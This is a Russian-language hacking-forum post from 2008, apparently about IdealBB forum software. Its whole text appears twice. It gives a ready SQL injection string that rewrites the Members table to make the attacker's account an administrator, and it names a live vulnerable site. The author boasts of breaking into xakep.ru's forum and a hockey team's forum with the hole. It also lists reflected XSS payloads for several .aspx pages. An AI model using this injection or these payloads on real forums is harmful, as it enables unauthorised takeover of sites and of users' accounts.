Liar
13.09.2008, 22:28
И так данная уязвимость была найдена у меня когда разбирал архив на диске, уязвимость заключается в том что отцувствует фильтрация в сообщениях пользователя благодоря которой мы можем выполнить произвольный скюл запрос ( что мы делаем в приведённом примере, а именно становимся администратором)
сам запрос: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407--
где:
[M_Level]=3 -даёт права админа
[Member_ID]=3407 - ваш id.
пример:
до запроса:
http://img183.imageshack.us/img183/6306/91295871wo0.th.jpg (http://img183.imageshack.us/my.php?image=91295871wo0.jpg)
сам запрос:
http://img183.imageshack.us/img183/7764/60743179sk3.th.jpg (http://img183.imageshack.us/my.php?image=60743179sk3.jpg)
после:
http://img183.imageshack.us/img183/1500/31093714ej3.th.jpg (http://img183.imageshack.us/my.php?image=31093714ej3.jpg)
пример уязвимого форума:
http://www.lucianopires.com.br/idealbb/default.asp
-----------------------------
при помощи данной уязвимости когда то был взломан форум xakep.ru и мной форум хоккейной команды: ньюёрские ренжеры
так же на форуме присутствуют и XSS
/topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t ')%3C/script%3E
/categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealer t('r0t')%3C/script%3E
/topics.aspx?date=12/05/2005&boardID= 1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3 C/script%3E
/forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3 C/script%3E
/member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t' )%3C/script%3E
/topics.aspx?forumID=54&topicRepeater1-p= %22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
сам запрос: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407--
где:
[M_Level]=3 -даёт права админа
[Member_ID]=3407 - ваш id.
пример:
до запроса:
http://img183.imageshack.us/img183/6306/91295871wo0.th.jpg (http://img183.imageshack.us/my.php?image=91295871wo0.jpg)
сам запрос:
http://img183.imageshack.us/img183/7764/60743179sk3.th.jpg (http://img183.imageshack.us/my.php?image=60743179sk3.jpg)
после:
http://img183.imageshack.us/img183/1500/31093714ej3.th.jpg (http://img183.imageshack.us/my.php?image=31093714ej3.jpg)
пример уязвимого форума:
http://www.lucianopires.com.br/idealbb/default.asp
-----------------------------
при помощи данной уязвимости когда то был взломан форум xakep.ru и мной форум хоккейной команды: ньюёрские ренжеры
так же на форуме присутствуют и XSS
/topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t ')%3C/script%3E
/categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealer t('r0t')%3C/script%3E
/topics.aspx?date=12/05/2005&boardID= 1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3 C/script%3E
/forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3 C/script%3E
/member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t' )%3C/script%3E
/topics.aspx?forumID=54&topicRepeater1-p= %22%3E%3Cscript%3Ealert('r0t')%3C/script%3E